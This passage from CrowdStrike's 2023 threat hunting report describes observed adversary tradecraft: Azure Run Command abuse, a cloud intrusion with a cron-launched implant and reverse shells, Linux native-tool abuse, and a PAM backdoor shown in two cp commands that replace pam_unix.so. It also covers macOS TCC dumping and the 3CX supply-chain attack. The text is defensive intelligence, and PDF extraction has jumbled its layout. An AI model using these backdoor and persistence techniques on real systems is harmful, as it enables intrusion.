In the previous examples, the adversary initiated an outbound connection from
the cloud workload instance to an external website to download malicious files.
Cloud workload servers should be subject to at least the same security policies as
any other server. Best practice dictates that outbound connections initiated from
any server should be denied other than to allowlisted endpoints.30 This practice
accomplishes two important goals: First, it helps to deny the adversary access
to internet resources and prevents direct malware ingress. Second, if an attack
should progress, it makes it much more difficult for an adversary to exfiltrate data or
establish a C2 channel directly from the compromised cloud asset to an external
endpoint.
Run Commands are part of the default VM agent and legitimately used to manage
Azure VMs. Azure supports multiple versions of Windows and various distributions
of Linux. Azure Run Commands similarly support both operating systems. Azure
Run Commands can be executed in several ways, including from the Azure Portal,
Azure REST API, Azure Command-Line Interface (CLI) and through PowerShell on
an Azure VM. An adversary can use Azure Run Commands to execute with elevated
privileges — PowerShell scripts on a Windows VM run as SYSTEM, and shell scripts
on a Linux VM run as root. This creates potential for remote execution, lateral
movement and privilege escalation, as such permissions to execute Azure Run
Commands must be tightly controlled and closely monitored for any changes.
Adversaries are actively exploiting this feature in Azure. In one example, Falcon
OverWatch observed SCATTERED SPIDER execute a PowerShell script via the
RunPowerShellScript command to deploy an RMM binary to a set of Azure VMs.
Falcon OverWatch also observed adversaries attempting to use the technique to
deploy RMM binaries and other tools across Linux VMs.
To date, Falcon OverWatch has observed Azure Run Commands used primarily
in attempts to deploy tooling across a victim environment. However, the elevated
privileges under which the scripts execute could also allow an adversary to read
privileged files, exfiltrate data and alter permissions of other files and directories,
to name a few actions.
Defensive Countermeasures
Know where to look for trouble.
If malicious activity is suspected, the following locations are relevant for defenders
to understand what is occuring.
For Azure Windows VMs, downloaded scripts will be placed in the following
directories for execution:
C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<agent_
version>\Downloads\
Output from the execution of the scripts can be found in a similar location:
C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<agent_
version>\Status\
For Azure Linux VMs, both the downloaded scripts and the execution output
(stdout and stderr) will be written in the same directory:
/var/lib/waagent/run-command/download/
This intrusion, explored in more detail in Figure 11, highlights the expanded
attack surface customers must now protect and the necessity of securing both
on-premises and cloud infrastructure components.
Defensive Countermeasures
Identify and manage vulnerabilities.
Regularly monitor cloud assets and applications for vulnerabilities, and patch or
otherwise address identified risks in a timely manner. Vulnerable internet-facing
cloud assets, in particular, are at risk of facilitating initial access for adversaries.
Consider adopting cloud workload protection (CWP) solutions that offer continuous
vulnerability management in addition to endpoint detection and response (EDR)
and other runtime protections at both the cloud virtual machine and container levels.
Initial Access
The adversary exploited an RCE vulnerability
that existed in a custom PHP application
running on multiple Linux servers hosted in the
victim organization's Cloud Service Provider
Persistence
environment.
A cron job was created to download and run the Silver
implant upon reboot. Silver is an open-source cross-platform
adversary emulation/red team framework.
Discovery
Various discovery commands were executed,
Command and Control
including attempts to view potentially sensitive
information. The adversary leveraged SSM Orchestration in an
attempt to execute multiple Python reverse shells.
Figure 11. Highlights from an intrusion against a cloud service provider system © 2023 CrowdStrike, Inc. All rights reserved.
NOWHERE TO HIDE 38
CROWDSTRIKE 2023 THREAT HUNTING REPORT
Cross-Platform Proficiency
Takes Center Stage
Today’s organizations rely on multiple operating systems working in concert for
IT environments to run efficiently. Falcon OverWatch threat hunters are skilled at
hunting across all major platforms — Windows, Linux and macOS.
This year, Falcon OverWatch saw adversaries showcase their prowess across all
of these systems. LABYRINTH CHOLLIMA led the charge, highlighting their ability
to operate across Windows and macOS in their targeting of the 3CX supply chain.
Notorious for targeting financial technology and cryptocurrency organizations,
LABYRINTH CHOLLIMA was observed updating both their custom tooling and
their tradecraft to work specifically on Linux and macOS. Key Facts and
Figures at a Glance:
¼ 3x increase in adversaries
Threat Actor Spotlight: LABYRINTH CHOLLIMA replacing Pluggable
Authentication Modules
LABYRINTH CHOLLIMA is one of the most prolific Democratic People’s Republic
(PAM) with malicious
of Korea (DPRK) adversaries tracked by CrowdStrike and has been active since at
modules in Linux, typically for
least 2009. CrowdStrike assesses this adversary is likely affiliated with Bureau 121
the purposes of a backdoor
of the DPRK’s Reconnaissance General Bureau (RGB) — North Korea’s preeminent
intelligence service. ¼ Technology,
telecommunications and
Their currency generation operations are global in scope, and stolen proceeds
academic are the top
appear to be a lifeline for the DPRK regime. LABYRINTH CHOLLIMA’s operations
targeted Linux verticals
have varied in complexity and exhibit tradecraft ranging from pedestrian to state-
of-the-art, suggesting this group is supported by a large number of operators with ¼ Finance, technology and
varying technical aptitude. LABYRINTH CHOLLIMA’s campaigns broadly trend services are the top targeted
toward a greater emphasis on operational security and defense evasion tactics, macOS verticals
with the adversary increasing efforts to evade traditional detection methods and
hinder third-party analysis and tracking of its campaigns. ¼ LABYRINTH CHOLLIMA
has proven they are adept
at operating in all major
operating systems
The Role of
GOVERNMENT
FINANCIAL
RETAIL
PHARMACEUTICAL
TECHNOLOGY
MEDIA
ENERGY
TELECOMMUNICATIONS
ACADEMIC
HEALTHCARE
MANUFACTURING
SERVICES
OTHER
INSURANCE
REAL ESTATE
AEROSPACE/DEFENSE
Linux Hosts in an
Organization
Because Linux hosts primarily
function as infrastructure as opposed
to end-user machines, typical social
Figure 12. Linux-based intrusion activity by industry vertical, July 2022 to engineering tactics that require end-
June 2023 user interaction — such as phishing
attachments or end-user execution
Common Linux Tooling Provides Substantial Functionality to — are not viable initial access
Adversaries techniques. Instead, adversaries
targeting Linux systems either
Over the past year, Falcon OverWatch observed adversaries traversing most leverage vulnerabilities in public-
tactics across the MITRE ATT&CK framework, leveraging only native or widely facing applications or externally
accessible command-line tooling. For example, an adversary can leverage nmap exposed remote services, or abuse
for network discovery; 33 cat to read various credentials, history,34 configuration, valid credentials to gain access to a
and database files; ps, grep or find to perform discovery on running target device. Once on a Linux host,
processes and existing files; ping for connectivity checks;35 curl, git or wget an adversary’s success often hinges
to download files; as to translate assembly code to object code; bash or python to on their ability to execute intrusions by
execute said scripts; and rm to delete logs and clean up their tracks.36 leveraging native tools within a Linux
environment. Where the required
tools are not immediately available,
they are often easily accessible by
leveraging native binaries to pull down
scripts or tools from repositories or
adversary staging servers.
33 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1046/.
34 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/003/.
35 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1016/001/.
36 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/004/.
© 2023 CrowdStrike, Inc. All rights reserved.
NOWHERE TO HIDE 40
CROWDSTRIKE 2023 THREAT HUNTING REPORT
Bash is the default shell in most Linux installations. Falcon OverWatch, however,
has observed adversaries use alternative shells like dash and zshell (zsh) in their
interactive intrusions. Given that most security tools leverage string matching in
detections, Falcon OverWatch hypothesizes that the use of alternate shells could
be attributed to signature evasion and adversarial preferences for increased speed,
hyperthreading and/or smaller size. Though alternative shells like dash may lack some
features like tab completion, Falcon OverWatch predicts that alternative shells will
remain popular in the future.
Though this tactic is not very common, Falcon OverWatch observed a threefold
increase year over year in adversaries replacing PAM37 with malicious modules,
typically for the purposes of a backdoor. The legitimate PAM, depending on the
distribution, tends to reside in /usr/lib64/security/pam_unix.so or /usr/lib/
security/pam_unix.so. The adversaries masquerade38 their malicious module as
the PAM pam_unix.so or have their malicious version staged in another directory
(e.g., /tmp/pam_unix.so) before overwriting the legitimate module.
cp -i pam_unix.so pam_unix.so.1
cp -i /tmp/pam_unix.so pam_unix.so
In the above example, the touch commands were likely used to conduct
timestomping39 to further evade detection.
37 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/003/.
38 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1036/005/.
39 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/006/.
TECHNOLOGY
SERVICES
ACADEMIC
MANUFACTURING
OTHER
TRANSPORTATION/LOGISTICS
If an adversary were to gain write access to the TCC.db, they could grant
themselves TCC entitlements without alerting the user.
Apple implemented System Integrity Protection (SIP) to mitigate this. Being able
to read the contents of the database, however, is trivial — an adversary requires
the terminal to have full disk access, which may be already enabled on many
MacBooks. With the dumped database, an adversary would likely leverage the
outputs to determine what applications are allowed to access which services
and any code-signing requirement data (csreq). The output of this dump would
present a gold mine of possible applications to exploit. However, the CrowdStrike
Falcon agent prevents the dumping of the TCC database on macOS hosts.
Defensive Countermeasures
With the advances adversaries are making in targeting Linux and macOS
environments, defenders must familiarize themselves with macOS and Linux TTPs
and implement the appropriate defenses across their infrastructure.
This attack is the result of a unique and complex adversarial supply chain
operation. It was not simply a single supply chain compromise; rather, it was
a layered exploitation — a double supply chain attack. The threat actor first
breached third-party software used by 3CX, which then provided the necessary
conduit to ultimately compromise the 3CXDesktopApp.41
The resulting compromise led to the delivery of the Gopuram backdoor, which
affected both Windows and macOS versions of the software. Gopuram is a
stealthy second-stage backdoor that employs numerous evasion techniques
to gain unauthorized access and persist on the target host. Once deployed, the
backdoor enabled the threat actor to execute commands, upload and download
files, manipulate processes and services, and exfiltrate sensitive data — posing a
considerable threat to victim organizations' networks.42 LABYRINTH CHOLLIMA’s
targets in this campaign were predominantly cryptocurrency companies,
once again highlighting the unique nature of this DPRK-nexus threat actor's
sophisticated operations focused on financial gain.
Conclusion
This report pulls back the curtain on the reality that Falcon OverWatch threat hunters
face daily: Adversaries are continuously striving to broaden their reach and deepen
their impact, despite the barriers placed before them by security products.
Falcon OverWatch values collaboration with their customers and the security
community. This report aims to share perspectives and insights Falcon OverWatch
threat hunters derive from seeing interactive intrusion attempts on a daily basis.
Defenders can find specific recommendations on how to identify and disrupt
adversary activity at the end of each section. Executives and decision makers can
find important facts and figures on the first page of each key theme.
As the technologies and security products that organizations rely on evolve, so too
do adversary tooling and tradecraft — at an alarming pace. This is the niche that
Hunters pursue
human-driven threat hunting fills within the security industry. Hunters pursue evolving
evolving threats with
threats with the same tenacity, creativity and technical proficiency that they see in the
the same tenacity,
adversary.
creativity and
It is harnessing the power of human ingenuity — through the joint efforts of hunters technical proficiency
and intelligence analysts — that truly leaves adversaries nowhere to hide. that they see in the
adversary.
About Falcon
OverWatch
The CrowdStrike Falcon OverWatch managed threat hunting service is built on the
CrowdStrike Falcon platform. Falcon OverWatch’s mission is simple — to augment
technology-based defenses with 24/7/365 human-led analysis to uncover attempts
to subvert automated detection controls.
44 For more information on how Falcon OverWatch performs its mission, please see https://www.crowdstrike.com/services/
managed-services/falcon-overwatch-threat-hunting/.
CrowdStrike
Products and
Services
Endpoint Security and XDR
Protects against all types of threats, from malware and ransomware to sophisticated
attacks, and deploys in minutes, immediately protecting your endpoints
Offers industry-leading EDR and extended detection and response (XDR) in a single
solution, and customers can easily expand from EDR to XDR using XDR connector
packs
Provides the visibility and precise control required to enable safe usage of USB devices
across your organization
Delivers simple, centralized host firewall management, making it easy to manage and
control host firewall policies
Protects against threats to iOS and Android devices, extending XDR/EDR capabilities to
your mobile devices, with advanced threat protection and real-time visibility into app and
network activity
Partners you with a team of elite cybersecurity experts to hunt continuously within the
Falcon platform for faint signs of sophisticated intrusions, leaving attackers nowhere to
hide
Extends your team with an assigned CrowdStrike threat hunting analyst, providing
dedicated expertise, tactical day-to-day insights into your threat landscape and
strategic advisory to help drive continuous improvement
Stops and eradicates threats in minutes with 24/7 expert management, monitoring and
surgical remediation, backed by the industry’s strongest Breach Prevention Warranty
Threat Intelligence
Enriches the events and incidents detected by the CrowdStrike Falcon platform,
automating intelligence so security operations teams can make better, faster decisions
Monitors potentially malicious activity across the open, deep and dark web, enabling you
to better protect your brand, employees and sensitive data
Uncovers the full malware attack life cycle with in-depth insight into all file, network,
memory and process activity, and provides easy-to-understand reports, actionable
indicators of compromise (IOCs) and seamless integration
Cloud Security
Delivers cloud and container security and breach protection: cloud security posture
management, threat detection and response across on-premises, hybrid and multi-
cloud environments, and cloud workload protection, including container security and
Kubernetes protection
Provides cloud and container security, including threat intelligence, detection and
response, container image security and Kubernetes protection
Unearths cloud threats, from unique cloud attack paths with complex trails of cloud IOAs
and indicators of misconfiguration (IOMs) to well-concealed adversary activity in your
critical cloud infrastructure — including AWS, Azure and Google Cloud Platform
Provides the first and only fully managed CWP solution, delivering 24/7 expert security
management, threat hunting, monitoring and response for cloud workloads, backed by
CrowdStrike’s industry-leading Breach Prevention Warranty
Recover from a cloud data breach and secure your cloud platform configurations using
the expertise of our professional services:
Continuously discovers and maps all internet-facing assets to shut down potential
exposure with guided mitigation plans to reduce the attack surface
Provides real-time, comprehensive and centralized visibility that boosts compliance and
offers relevant contextual data
Automates collection of point-in-time and historic forensic triage data for robust analysis
of cybersecurity incidents
Identity Protection
Helps you deploy the Falcon identity protection solutions to stop identity-based attacks
from impacting your business using the expertise of our professional services:
Observability
Purpose-built for large-scale logging and real-time analysis of all of your data, metrics
and traces, providing live observability for organizations of all sizes
Reduces cost and improves visibility with long-term scalable storage of historical and
real-time Falcon platform data
Delivers expertise and continuous guidance for log management and observability
programs to ingest, aggregate and analyze massive volumes of streaming log data at
petabyte scale
CrowdStrike Services
Delivers incident response (IR), technical assessments, training and advisory services
that help you prepare to defend against advanced threats, respond to widespread
attacks and enhance your cybersecurity practices and controls
Helps you prepare to defend Helps you stop breaches, Helps you enhance
against sophisticated investigate incidents and your cybersecurity
threat actors with real-life recover from attacks with posture with actionable
simulation exercises speed and surgical precision recommendations to fortify
your defenses
About CrowdStrike
CrowdStrike (Nasdaq: CRWD), a global cybersecurity leader, has redefined modern
security with the world’s most advanced cloud-native platform for protecting critical
areas of enterprise risk-endpoints and cloud workloads, identity and data.
Powered by the CrowdStrike Security Cloud and world-class AI, the CrowdStrike
Falcon® platform leverages real-time indicators of attack, threat intelligence, evolving
adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-
accurate detections, automated protection and remediation, elite threat hunting and
prioritized observability of vulnerabilities.
CrowdStrike
We stop breaches.
Learn more: www.crowdstrike.com
Follow us:
Blog | Twitter | LinkedIn | Facebook | Instagram
© 2023 CrowdStrike, Inc. All rights reserved. CrowdStrike, the falcon logo, CrowdStrike Falcon and CrowdStrike Threat Graph
are marks owned by CrowdStrike, Inc. and registered with the United States Patent and Trademark Office, and in other countries.
CrowdStrike owns other trademarks and service marks, and may use the brands of third parties to identify their products and
services.